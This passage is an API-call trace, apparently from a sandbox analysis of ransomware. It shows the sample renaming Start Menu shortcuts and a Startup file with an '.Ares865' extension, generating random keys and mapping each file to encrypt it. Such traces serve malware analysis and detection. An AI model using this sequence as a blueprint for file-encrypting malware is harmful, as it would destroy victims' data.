lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.752] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1130) returned 1 [0066.752] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.753] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.753] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.753] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x118 [0066.753] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x190000 [0066.753] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.754] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.754] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.756] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Google Chrome.lnk.Ares865") returned 64 [0066.756] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Google Chrome.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\google chrome.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Google Chrome.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\google chrome.lnk.ares865"), dwFlags=0x1) returned 1 [0066.757] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Google Chrome.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\google chrome.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.757] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2269) returned 1 [0066.757] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.758] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.758] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.758] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbe0, lpName=0x0) returned 0x118 [0066.760] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbe0) returned 0x190000 [0066.761] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.762] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.762] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.762] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Media Center.lnk.Ares865") returned 63 [0066.762] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Media Center.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\media center.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Media Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\media center.lnk.ares865"), dwFlags=0x1) returned 1 [0066.763] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Media Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\media center.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.764] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1345) returned 1 [0066.764] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.765] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.765] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.765] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x118 [0066.766] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0066.773] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0066.773] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.773] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.774] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Mozilla Firefox.lnk.Ares865") returned 66 [0066.774] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Mozilla Firefox.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\mozilla firefox.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Mozilla Firefox.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\mozilla firefox.lnk.ares865"), dwFlags=0x1) returned 1 [0066.775] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Mozilla Firefox.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\mozilla firefox.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.775] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1169) returned 1 [0066.775] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0066.776] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.776] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.776] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x118 [0066.777] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x190000 [0066.782] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.783] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.783] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.784] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Sidebar.lnk.Ares865") returned 58 [0066.784] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Sidebar.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\sidebar.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Sidebar.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\sidebar.lnk.ares865"), dwFlags=0x1) returned 1 [0066.785] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Sidebar.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\sidebar.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.785] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1330) returned 1 [0066.785] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.786] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.786] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.786] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x118 [0066.787] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x190000 [0066.796] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.797] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.797] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.797] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk.Ares865") returned 74 [0066.797] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\windows anytime upgrade.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\windows anytime upgrade.lnk.ares865"), dwFlags=0x1) returned 1 [0066.798] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Anytime Upgrade.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\windows anytime upgrade.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.799] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1352) returned 1 [0066.799] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.799] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.799] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.800] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x118 [0066.801] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0066.802] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.803] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.803] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.803] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Windows DVD Maker.lnk.Ares865") returned 68 [0066.803] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows DVD Maker.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\windows dvd maker.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows DVD Maker.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\windows dvd maker.lnk.ares865"), dwFlags=0x1) returned 1 [0066.804] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows DVD Maker.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\windows dvd maker.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.804] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1326) returned 1 [0066.805] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.805] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.805] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.805] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x118 [0066.807] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x190000 [0066.818] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.819] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.819] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.820] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Fax and Scan.lnk.Ares865") returned 71 [0066.820] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Fax and Scan.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\windows fax and scan.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Fax and Scan.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\windows fax and scan.lnk.ares865"), dwFlags=0x1) returned 1 [0066.821] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Fax and Scan.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\windows fax and scan.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.821] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1210) returned 1 [0066.821] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.822] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.822] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.822] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x118 [0066.822] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x190000 [0066.822] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.823] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.823] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.828] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Media Player.lnk.Ares865") returned 71 [0066.828] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Media Player.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\windows media player.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Media Player.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\windows media player.lnk.ares865"), dwFlags=0x1) returned 1 [0066.829] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Windows Media Player.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\windows media player.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.829] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1547) returned 1 [0066.829] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.830] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.830] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.830] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x910, lpName=0x0) returned 0x118 [0066.832] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x910) returned 0x190000 [0066.847] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0066.849] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.849] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.850] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0066.850] CloseHandle (hObject=0x118) returned 1 [0066.850] CloseHandle (hObject=0x164) returned 1 [0066.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0066.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0066.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0066.851] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa62784, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8aa62784, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8aa62784, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XPS Viewer.lnk", cAlternateFileName="XPSVIE~1.LNK")) returned 1 [0066.851] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\XPS Viewer.lnk.Ares865") returned 61 [0066.851] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\XPS Viewer.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\xps viewer.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\XPS Viewer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\xps viewer.lnk.ares865"), dwFlags=0x1) returned 1 [0066.855] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\XPS Viewer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\xps viewer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.855] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1246) returned 1 [0066.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0066.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0066.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0066.856] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0066.857] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.857] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.857] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x118 [0066.857] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0066.858] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0066.858] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.858] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0066.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0066.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.859] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0066.859] CloseHandle (hObject=0x118) returned 1 [0066.859] CloseHandle (hObject=0x164) returned 1 [0066.860] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0066.860] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0066.861] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0066.861] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa62784, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8aa62784, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8aa62784, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XPS Viewer.lnk", cAlternateFileName="XPSVIE~1.LNK")) returned 0 [0066.861] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0066.861] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2648 [0066.864] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865") returned 66 [0066.864] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\all users\\start menu\\programs\\startup\\desktop.ini"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\startup\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.871] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\startup\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.871] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0066.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.872] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.873] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.873] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.873] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x12c [0066.874] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0066.874] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, 